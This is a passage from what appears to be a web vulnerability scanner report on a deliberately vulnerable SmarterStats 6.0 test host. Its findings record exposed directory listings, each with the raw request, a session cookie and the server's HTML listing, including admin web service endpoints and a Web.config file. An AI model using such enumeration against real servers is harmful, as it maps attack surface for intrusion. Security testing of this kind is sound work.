Thursday, October 07, 2010 01:00 PM 2,344 <A href="frmExportLogs.aspx">frmExportLogs.aspx</A>
Thursday, October 07, 2010 01:00 PM 3,001 <A href="frmFavoriteReport.aspx">frmFavoriteReport.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,009 <A href="frmFavoriteReports.aspx">frmFavoriteReports.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,549 <A href="frmFilterSets.aspx">frmFilterSets.aspx</A>
Thursday, October 07, 2010 01:00 PM 6,016 <A href="frmImportSettings.aspx">frmImportSettings.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,070 <A href="frmLogsImported.aspx">frmLogsImported.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,094 <A href="frmPageAliases.aspx">frmPageAliases.aspx</A>
Thursday, October 07, 2010 01:00 PM 5,434 <A href="frmSeoCollection.aspx">frmSeoCollection.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,375 <A href="frmSeoCollections.aspx">frmSeoCollections.aspx</A>
Thursday, October 07, 2010 01:00 PM 3,768 <A href="frmSeoCompetitorEvaluation.aspx">frmSeoCompetitorEvaluation.aspx</A>
Thursday, October 07, 2010 01:00 PM 4,977 <A href="frmSeoKeywordEvaluation.aspx">frmSeoKeywordEvaluation.aspx</A>
Thursday, October 07, 2010 01:00 PM 902 <A href="frmSeoProcessingStatus.aspx">frmSeoProcessingStatus.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,814 <A href="frmSeoSettings.aspx">frmSeoSettings.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,241 <A href="frmSkins.aspx">frmSkins.aspx</A>
Thursday, October 07, 2010 01:00 PM 3,711 <A href="frmUser.aspx">frmUser.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,048 <A href="frmUsers.aspx">frmUsers.aspx</A>
Thursday, October 07, 2010 01:00 PM 818 <A href="frmViewOverviewReport.aspx">frmViewOverviewReport.aspx</A>
Thursday, October 07, 2010 01:00 PM 8,309 <A href="frmViewReports.aspx">frmViewReports.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,998 <A href="frmWelcome.aspx">frmWelcome.aspx</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Popups/">Popups</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.66. http://vulnerable.smarterstats.6.0.host:9999/Client/Popups/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/Popups/

Request

GET /Client/Popups/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:25:57 GMT
Content-Length: 3232
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Client/Popups/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /Client/Popups/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/Client/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 1,132 <A href="frmDataMine.aspx">frmDataMine.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,326 <A href="frmDeleteConfirm.aspx">frmDeleteConfirm.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,463 <A href="frmEmailReport.aspx">frmEmailReport.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,078 <A href="frmExportReport.aspx">frmExportReport.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,668 <A href="frmFavoriteReport.aspx">frmFavoriteReport.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,020 <A href="frmFilterSet.aspx">frmFilterSet.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,710 <A href="frmImportDynamicPage.aspx">frmImportDynamicPage.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,284 <A href="frmImportFilter.aspx">frmImportFilter.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,423 <A href="frmPageAlias.aspx">frmPageAlias.aspx</A>
Thursday, October 07, 2010 01:00 PM 658 <A href="frmPrintPreview.aspx">frmPrintPreview.aspx</A>
Thursday, October 07, 2010 01:00 PM 781 <A href="frmReprocess.aspx">frmReprocess.aspx</A>
Thursday, October 07, 2010 01:00 PM 785 <A href="frmRetrieveSEO.aspx">frmRetrieveSEO.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,292 <A href="frmSeoAddItems.aspx">frmSeoAddItems.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,496 <A href="frmSeoCompetitor.aspx">frmSeoCompetitor.aspx</A>
Thursday, October 07, 2010 01:00 PM 3,303 <A href="frmSeoCompetitorRetrieval.aspx">frmSeoCompetitorRetrieval.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,672 <A href="frmSeoKeyword.aspx">frmSeoKeyword.aspx</A>
Thursday, October 07, 2010 01:00 PM 3,238 <A href="frmSeoKeywordRetrieval.aspx">frmSeoKeywordRetrieval.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,997 <A href="frmSiteFileBrowser.aspx">frmSiteFileBrowser.aspx</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.67. http://vulnerable.smarterstats.6.0.host:9999/Services/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/

Request

GET /Services/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:14:28 GMT
Content-Length: 2326
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Services/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /Services/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 100 <A href="Bandwidth.asmx">Bandwidth.asmx</A>
Thursday, October 07, 2010 01:00 PM 104 <A href="Diagnostics.asmx">Diagnostics.asmx</A>
Thursday, October 07, 2010 01:00 PM 104 <A href="ProductInfo.asmx">ProductInfo.asmx</A>
Thursday, October 07, 2010 01:00 PM 92 <A href="Query.asmx">Query.asmx</A>
Thursday, October 07, 2010 01:00 PM 104 <A href="ServerAdmin.asmx">ServerAdmin.asmx</A>
Thursday, October 07, 2010 01:00 PM 100 <A href="SiteAdmin.asmx">SiteAdmin.asmx</A>
Thursday, October 07, 2010 01:00 PM 102 <A href="Statistics.asmx">Statistics.asmx</A>
Thursday, October 07, 2010 01:00 PM 112 <A href="svcGlobalUpdate.asmx">svcGlobalUpdate.asmx</A>
Thursday, October 07, 2010 01:00 PM 118 <A href="svcRealTimeService.asmx">svcRealTimeService.asmx</A>
Thursday, October 07, 2010 01:00 PM 100 <A href="UserAdmin.asmx">UserAdmin.asmx</A>
Thursday, October 07, 2010 01:00 PM 618 <A href="Web.config">Web.config</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.68. http://vulnerable.smarterstats.6.0.host:9999/Temp/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/

Request

GET /Temp/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:30:42 GMT
Content-Length: 16417
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Temp/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /Temp/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/">[To Parent Directory]</A>

Saturday, October 09, 2010 10:39 PM 7,369 <A href="02ed0b849d4046d18477326237444907.jpg">02ed0b849d4046d18477326237444907.jpg</A>
Saturday, October 09, 2010 10:45 PM 8,761 <A href="038eef636bd84432be4c50ca82960c59.jpg">038eef636bd84432be4c50ca82960c59.jpg</A>
Saturday, October 09, 2010 10:45 PM 8,761 <A href="040bfb01d90244e69d4ae18aeee0871b.jpg">040bfb01d90244e69d4ae18aeee0871b.jpg</A>
Saturday, October 09, 2010 10:39 PM 6,349 <A href="06c15603984c428c919ec3a55086590d.jpg">06c15603984c428c919ec3a55086590d.jpg</A>
Saturday, October 09, 2010 10:31 PM 6,349 <A href="0c2c2823b31f46149208732c08a4fee8.jpg">0c2c2823b31f46149208732c08a4fee8.jpg</A>
Saturday, October 09, 2010 10:45 PM 8,473 <A href="0e01099773594c85adff10c0e0e6fca3.jpg">0e01099773594c85adff10c0e0e6fca3.jpg</A>
Saturday, October 09, 2010 10:33 PM 8,761 <A href="1039b7037bea4372821b6b290d0745da.jpg">1039b7037bea4372821b6b290d0745da.jpg</A>
Saturday, October 09, 2010 10:39 PM 18,228 <A href="11b655a3f9714140aff010d48c64d670.jpg">11b655a3f9714140aff010d48c64d670.jpg</A>
Saturday, October 09, 2010 10:59 PM 18,895 <A href="1d4802d431604203a5254435a7181b01.jpg">1d4802d431604203a5254435a7181b01.jpg</A>
Saturday, October 09, 2010 10:59 PM 7,501 <A href="1f19d55ce9bf405b93deb28b84494a1f.jpg">1f19d55ce9bf405b93deb28b84494a1f.jpg</A>
Saturday, October 09, 2010 10:59 PM 19,860 <A href="20226bc24c8e4c89926647164054826e.jpg">20226bc24c8e4c89926647164054826e.jpg</A>
Saturday, October 09, 2010 10:45 PM 7,369 <A href="202d0437683d44bcadebcd0e325ad27a.jpg">202d0437683d44bcadebcd0e325ad27a.jpg</A>
Saturday, October 09, 2010 10:45 PM 8,473 <A href="213f7b6f07f94b71bc0292c0271298ed.jpg">213f7b6f07f94b71bc0292c0271298ed.jpg</A>
Saturday, October 09, 2010 10:45 PM 6,349 <A href="23de8fa35b8a44e9ab7b5c746eaec349.jpg">23de8fa35b8a44e9ab7b5c746eaec349.jpg</A>
Saturday, October 09, 2010 10:45 PM 8,473 <A href="26661af650a74ef4b35cb5ccc5989337.jpg">26661af650a74ef4b35cb5ccc5989337.jpg</A>
Saturday, October 09, 2010 10:32 PM 8,473 <A href="26da1ed6256b4e7f89617f968309aea9.jpg">26da1ed6256b4e7f89617f968309aea9.jpg</A>
Saturday, October 09, 2010 10:33 PM 8,473 <A href="29bf53d9459f4ad5897ed8fe1e6273c6.jpg">29bf53d9459f4ad5897ed8fe1e6273c6.jpg</A>
Saturday, October 09, 2010 10:45 PM 8,761 <A href="2dd85c4c9ce2426b9587f5bb5361172b.jpg">2dd85c4c9ce2426b9587f5bb5361172b.jpg</A>
Saturday, October 09, 2010 10:59 PM 12,688 <A href="3022c349e42e4a16915d331a96969eb5.jpg">3022c349e42e4a16915d331a96969eb5.jpg</A>
Saturday, October 09, 2010 11:00 PM 15,196 <A href="3222a4e4084e4ebaba56800c9541d205.jpg">3222a4e4084e4ebaba56800c9541d205.jpg</A>
Saturday, October 09, 2010 10:59 PM 7,526 <A href="3568cde247644a1b9ec6e79fbea220fc.jpg">3568cde247644a1b9ec6e79fbea220fc.jpg</A>
Saturday, October 09, 2010 10:59 PM 10,168 <A href="356d07443f3445d88a06bf724a953c85.jpg">356d07443f3445d88a06bf724a953c85.jpg</A>
Saturday, October 09, 2010 11:00 PM 9,893 <A href="39229b827f9a4525b6fa10ef8a98a9f1.jpg">39229b827f9a4525b6fa10ef8a98a9f1.jpg</A>
Saturday, October 09, 2010 10:59 PM 7,526 <A href="3a06471f3515434aa5438ccdb1d520e8.jpg">3a06471f3515434aa5438ccdb1d520e8.jpg</A>
Saturday, October 09, 2010 10:45 PM 6,349 <A href="3a10f4293c024a35b1616470e3979bc0.jpg">3a10f4293c024a35b1616470e3979bc0.jpg</A>
Saturday, October 09, 2010 10:33 PM 6,349 <A href="3a8d8b9425a049fd9040fcd161eeba53.jpg">3a8d8b9425a049fd9040fcd161eeba53.jpg</A>
Saturday, October 09, 2010 10:45 PM 8,761 <A href="4556f08b0fff4f02918132aab44c44c2.jpg">4556f08b0fff4f02918132aab44c44c2.jpg</A>
Saturday, October 09, 2010 10:45 PM 8,473 <A href="465308c158fb40349ccfbf3f046f03fb.jpg">465308c158fb40349ccfbf3f046f03fb.jpg</A>
Saturday, October 09, 2010 10:33 PM 7,369 <A href="47b58eea1f494809bf127e28495c2dd7.jpg">47b58eea1f494809bf127e28495c2dd7.jpg</A>
Saturday, October 09, 2010 10:33 PM 6,349 <A href="48e37748c1fa4d0ca56699e5b80f0064.jpg">48e37748c1fa4d0ca56699e5b80f0064.jpg</A>
Saturday, October 09, 2010 10:45 PM 8,761 <A href="514f1f85aad046feaf31c05789e1f2ce.jpg">514f1f85aad046feaf31c05789e1f2ce.jpg</A>
Saturday, October 09, 2010 10:37 PM 8,473 <A href="53bea176ee1943dd981fd05e032eff33.jpg">53bea176ee1943dd981fd05e032eff33.jpg</A>
Saturday, October 09, 2010 10:59 PM 10,264 <A href="56dd80bb97d8414fbcfd594ed4282909.jpg">56dd80bb97d8414fbcfd594ed4282909.jpg</A>
Saturday, October 09, 2010 10:32 PM 8,473 <A href="590bf795fdaf4e02b7d0880f79b70e34.jpg">590bf795fdaf4e02b7d0880f79b70e34.jpg</A>
Saturday, October 09, 2010 10:39 PM 8,761 <A href="5ad836c7d83649b7b70058a419ee1520.jpg">5ad836c7d83649b7b70058a419ee1520.jpg</A>
Saturday, October 09, 2010 10:59 PM 14,400 <A href="5bf056fa42644067bd0099f9d59829e2.jpg">5bf056fa42644067bd0099f9d59829e2.jpg</A>
Saturday, October 09, 2010 10:45 PM 8,473 <A href="5dcedfd87e9a4e42bda81c32d5081172.jpg">5dcedfd87e9a4e42bda81c32d5081172.jpg</A>
Saturday, October 09, 2010 10:45 PM 8,473 <A href="5e544919f12443d9ba394a44bbe898ed.jpg">5e544919f12443d9ba394a44bbe898ed.jpg</A>
Saturday, October 09, 2010 10:31 PM 7,369 <A href="60cde64eb7754b5d8ef26765f12a08ff.jpg">60cde64eb7754b5d8ef26765f12a08ff.jpg</A>
Saturday, October 09, 2010 10:39 PM 19,464 <A href="64257c718f9643f88a4385e27b02b8e3.jpg">64257c718f9643f88a4385e27b02b8e3.jpg</A>
Saturday, October 09, 2010 10:59 PM 9,648 <A href="67876ddccbec458db2d3c9fec41f1ab5.jpg">67876ddccbec458db2d3c9fec41f1ab5.jpg</A>
Saturday, October 09, 2010 10:45 PM 7,369 <A href="691a4e1c6e664989bd937935add21881.jpg">691a4e1c6e664989bd937935add21881.jpg</A>
Saturday, October 09, 2010 10:45 PM 6,349 <A href="6b7f606a5e314cd28e20c35638c6e54f.jpg">6b7f606a5e314cd28e20c35638c6e54f.jpg</A>
Saturday, October 09, 2010 10:45 PM 8,473 <A href="7368fd7f545b4b30b7fe9f34c5f64470.jpg">7368fd7f545b4b30b7fe9f34c5f64470.jpg</A>
Saturday, October 09, 2010 10:32 PM 7,369 <A href="788d1b2c29ad41fc956d04ff9b1e6a07.jpg">788d1b2c29ad41fc956d04ff9b1e6a07.jpg</A>
Saturday, October 09, 2010 10:45 PM 6,349 <A href="7a774e4ec97a464188601ea69196dbbb.jpg">7a774e4ec97a464188601ea69196dbbb.jpg</A>
Saturday, October 09, 2010 10:59 PM 16,586 <A href="7b3c6e936ca34e63ab51c459ff492d1e.jpg">7b3c6e936ca34e63ab51c459ff492d1e.jpg</A>
Saturday, October 09, 2010 10:45 PM 6,349 <A href="7b644ea5737246609bef481eb57a25f9.jpg">7b644ea5737246609bef481eb57a25f9.jpg</A>
Saturday, October 09, 2010 10:59 PM 13,037 <A href="8494271a59234d898cdd787b473092ed.jpg">8494271a59234d898cdd787b473092ed.jpg</A>
Saturday, October 09, 2010 10:45 PM 6,349 <A href="86043de99589448f9504e3a478717a21.jpg">86043de99589448f9504e3a478717a21.jpg</A>
Saturday, October 09, 2010 10:33 PM 7,369 <A href="869b700a3e8b4973a5fdd0981173fbce.jpg">869b700a3e8b4973a5fdd0981173fbce.jpg</A>
Saturday, October 09, 2010 10:33 PM 8,761 <A href="87c52fec79874f5a9f7278d96f4dc7f9.jpg">87c52fec79874f5a9f7278d96f4dc7f9.jpg</A>
Saturday, October 09, 2010 10:45 PM 7,369 <A href="88053fd41e1b4bac879d9cf9430ed362.jpg">88053fd41e1b4bac879d9cf9430ed362.jpg</A>
Saturday, October 09, 2010 10:39 PM 14,955 <A href="884956ac2e6947b6afb432bb883c4a4d.jpg">884956ac2e6947b6afb432bb883c4a4d.jpg</A>
Saturday, October 09, 2010 10:39 PM 13,499 <A href="9087a8272ec041bf8c578808d523fdcb.jpg">9087a8272ec041bf8c578808d523fdcb.jpg</A>
Saturday, October 09, 2010 10:59 PM 9,872 <A href="91331a080c0148b0bddd5d75991acb5b.jpg">91331a080c0148b0bddd5d75991acb5b.jpg</A>
Saturday, October 09, 2010 10:39 PM 3,703 <A href="997520e935b94c42be3d3928d5cdd943.jpg">997520e935b94c42be3d3928d5cdd943.jpg</A>
Saturday, October 09, 2010 10:32 PM 7,369 <A href="9b829667b5214dbb92b4f41517bde32f.jpg">9b829667b5214dbb92b4f41517bde32f.jpg</A>
Saturday, October 09, 2010 10:33 PM 8,761 <A href="9e3c5a71a82b4267ac3057765f388ecb.jpg">9e3c5a71a82b4267ac3057765f388ecb.jpg</A>
Saturday, October 09, 2010 11:00 PM 7,914 <A href="9f3048ac5739414fafeb40ed7e53f524.jpg">9f3048ac5739414fafeb40ed7e53f524.jpg</A>
Saturday, October 09, 2010 11:00 PM 10,506 <A href="a59b1eb6ffbe404286facae20fd2980c.jpg">a59b1eb6ffbe404286facae20fd2980c.jpg</A>
Saturday, October 09, 2010 10:31 PM 8,761 <A href="a61092b27bce47aa8accac88254b740c.jpg">a61092b27bce47aa8accac88254b740c.jpg</A>
Saturday, October 09, 2010 10:39 PM 7,914 <A href="a894833d13464a8dba69940423279c55.jpg">a894833d13464a8dba69940423279c55.jpg</A>
Saturday, October 09, 2010 10:31 PM 8,473 <A href="aa9f9504e4da409ebc871fa02f1cfc5d.jpg">aa9f9504e4da409ebc871fa02f1cfc5d.jpg</A>
Saturday, October 09, 2010 10:59 PM 18,895 <A href="aae65ef47a3d4937bffc2e1dbe58c809.jpg">aae65ef47a3d4937bffc2e1dbe58c809.jpg</A>
Saturday, October 09, 2010 10:33 PM 6,349 <A href="ab51ac96f4bc4739bd3a746f1b589cd7.jpg">ab51ac96f4bc4739bd3a746f1b589cd7.jpg</A>
Saturday, October 09, 2010 11:00 PM 18,208 <A href="ab9de7de016446bcbfda78cd6160c06f.jpg">ab9de7de016446bcbfda78cd6160c06f.jpg</A>
Thursday, October 07, 2010 01:00 PM 61 <A href="AboutThisFolder.txt">AboutThisFolder.txt</A>
Saturday, October 09, 2010 11:00 PM 3,703 <A href="ac7bf9894017464d897319def18138ed.jpg">ac7bf9894017464d897319def18138ed.jpg</A>
Saturday, October 09, 2010 10:59 PM 7,503 <A href="b2972344c54b45e38070638051bc9478.jpg">b2972344c54b45e38070638051bc9478.jpg</A>
Saturday, October 09, 2010 10:45 PM 7,369 <A href="b30220ec5cae4475bf35270b94c39e68.jpg">b30220ec5cae4475bf35270b94c39e68.jpg</A>
Saturday, October 09, 2010 10:45 PM 8,473 <A href="b6ca1caafb0b4009aa3ad6d8fde10877.jpg">b6ca1caafb0b4009aa3ad6d8fde10877.jpg</A>
Saturday, October 09, 2010 10:33 PM 7,369 <A href="b7378ea2600d4d34ad1d031c4003a06c.jpg">b7378ea2600d4d34ad1d031c4003a06c.jpg</A>
Saturday, October 09, 2010 10:59 PM 19,860 <A href="b994a8c169af455497c7747bd9914800.jpg">b994a8c169af455497c7747bd9914800.jpg</A>
Saturday, October 09, 2010 10:39 PM 14,955 <A href="be0ec9f059d54355b2f62968afe2cc8f.jpg">be0ec9f059d54355b2f62968afe2cc8f.jpg</A>
Saturday, October 09, 2010 10:39 PM 8,473 <A href="bf2a481505b34c4ab917d47515cd5028.jpg">bf2a481505b34c4ab917d47515cd5028.jpg</A>
Saturday, October 09, 2010 10:39 PM 18,228 <A href="c278e0d167d84f669702cdefeb42e10a.jpg">c278e0d167d84f669702cdefeb42e10a.jpg</A>
Saturday, October 09, 2010 10:39 PM 10,506 <A href="c3c97e97b6fa45e49c394c40be8de047.jpg">c3c97e97b6fa45e49c394c40be8de047.jpg</A>
Saturday, October 09, 2010 10:32 PM 8,761 <A href="c77c8b574b60474b8ac78495f6f074dc.jpg">c77c8b574b60474b8ac78495f6f074dc.jpg</A>
Saturday, October 09, 2010 10:45 PM 8,761 <A href="c836300e658a4c009b6270f08046d318.jpg">c836300e658a4c009b6270f08046d318.jpg</A>
Saturday, October 09, 2010 10:45 PM 7,369 <A href="cbb47e8679534278ad99e28629c2e7be.jpg">cbb47e8679534278ad99e28629c2e7be.jpg</A>
Saturday, October 09, 2010 10:45 PM 7,369 <A href="cbc89a553d994f98a7fcb559ed49fa7c.jpg">cbc89a553d994f98a7fcb559ed49fa7c.jpg</A>
Saturday, October 09, 2010 10:37 PM 8,761 <A href="cc02654a98df41d6bd5a3edd66c42234.jpg">cc02654a98df41d6bd5a3edd66c42234.jpg</A>
Saturday, October 09, 2010 10:45 PM 6,349 <A href="cf84f0ced6574644af3975a1bee20162.jpg">cf84f0ced6574644af3975a1bee20162.jpg</A>
Saturday, October 09, 2010 10:33 PM 8,473 <A href="d31a05bc3d6e479fa7f64287243f64e6.jpg">d31a05bc3d6e479fa7f64287243f64e6.jpg</A>
Saturday, October 09, 2010 11:00 PM 18,454 <A href="d4de660aff8a45d58af93e1c77cacf67.jpg">d4de660aff8a45d58af93e1c77cacf67.jpg</A>
Saturday, October 09, 2010 10:39 PM 14,020 <A href="d6340f654dca4d3d89bb152c084eb5b0.jpg">d6340f654dca4d3d89bb152c084eb5b0.jpg</A>
Saturday, October 09, 2010 10:45 PM 7,369 <A href="da65e443770d46cdae4f2d0c04845529.jpg">da65e443770d46cdae4f2d0c04845529.jpg</A>
Saturday, October 09, 2010 10:45 PM 8,473 <A href="e1050807478c486b8fa8ea6433a22c1b.jpg">e1050807478c486b8fa8ea6433a22c1b.jpg</A>
Saturday, October 09, 2010 10:45 PM 8,761 <A href="e118619098854fbcb80198ab8b2b5b1f.jpg">e118619098854fbcb80198ab8b2b5b1f.jpg</A>
Saturday, October 09, 2010 10:32 PM 6,349 <A href="e13bc484ceca45bb97f15bfcc30a6c03.jpg">e13bc484ceca45bb97f15bfcc30a6c03.jpg</A>
Saturday, October 09, 2010 10:45 PM 7,369 <A href="e2e610dadece46a5aa6f5282d244a34c.jpg">e2e610dadece46a5aa6f5282d244a34c.jpg</A>
Saturday, October 09, 2010 11:00 PM 14,268 <A href="e409cf040eec4b1bb561c9eaf628c2d5.jpg">e409cf040eec4b1bb561c9eaf628c2d5.jpg</A>
Saturday, October 09, 2010 10:45 PM 6,349 <A href="e6cb05ad288e42ccac454b7d8618b7bc.jpg">e6cb05ad288e42ccac454b7d8618b7bc.jpg</A>
Saturday, October 09, 2010 10:37 PM 7,369 <A href="e7d9eb9eadc04c58b59155ff298566e3.jpg">e7d9eb9eadc04c58b59155ff298566e3.jpg</A>
Saturday, October 09, 2010 10:32 PM 8,761 <A href="e7ea3804b059410d9c7faf6f178d6ae9.jpg">e7ea3804b059410d9c7faf6f178d6ae9.jpg</A>
Saturday, October 09, 2010 10:39 PM 18,208 <A href="eab38b1319fa42bd92cce27fb7fac490.jpg">eab38b1319fa42bd92cce27fb7fac490.jpg</A>
Saturday, October 09, 2010 10:45 PM 6,349 <A href="ef1f5cfab2a841198bab858c14abbb7f.jpg">ef1f5cfab2a841198bab858c14abbb7f.jpg</A>
Saturday, October 09, 2010 10:45 PM 8,761 <A href="efd85382af0a4882bff32adb6df3fa84.jpg">efd85382af0a4882bff32adb6df3fa84.jpg</A>
Saturday, October 09, 2010 10:37 PM 6,349 <A href="f0463b7c1a16472f90db2c0647d531bf.jpg">f0463b7c1a16472f90db2c0647d531bf.jpg</A>
Saturday, October 09, 2010 10:32 PM 6,349 <A href="f0b1d954de574491a98b97217656a58a.jpg">f0b1d954de574491a98b97217656a58a.jpg</A>
Saturday, October 09, 2010 10:59 PM 18,520 <A href="f11eb6ccf75a496c84ce62908bd4560d.jpg">f11eb6ccf75a496c84ce62908bd4560d.jpg</A>
Saturday, October 09, 2010 10:45 PM 7,369 <A href="f3901eb0cefc43e197e2e7620f61bd3f.jpg">f3901eb0cefc43e197e2e7620f61bd3f.jpg</A>
Saturday, October 09, 2010 11:00 PM 13,501 <A href="f39f2510e5c94b76b4bef992e2942cf3.jpg">f39f2510e5c94b76b4bef992e2942cf3.jpg</A>
Saturday, October 09, 2010 10:39 PM 9,893 <A href="f7e89702b21c43d7baf7d7bc53875d48.jpg">f7e89702b21c43d7baf7d7bc53875d48.jpg</A>
Saturday, October 09, 2010 10:45 PM 8,761 <A href="f8bc82ce050641ddb9db33fd303c8753.jpg">f8bc82ce050641ddb9db33fd303c8753.jpg</A>
Saturday, October 09, 2010 10:33 PM 8,473 <A href="f8ef6da096584c109a8620d83d0d2462.jpg">f8ef6da096584c109a8620d83d0d2462.jpg</A>
Saturday, October 09, 2010 11:00 PM 19,464 <A href="fe444cf085194df7ac674a18794ac281.jpg">fe444cf085194df7ac674a18794ac281.jpg</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.69. http://vulnerable.smarterstats.6.0.host:9999/UserControls/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /UserControls/

Request

GET /UserControls/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:24:01 GMT
Content-Length: 2325
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /UserControls/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
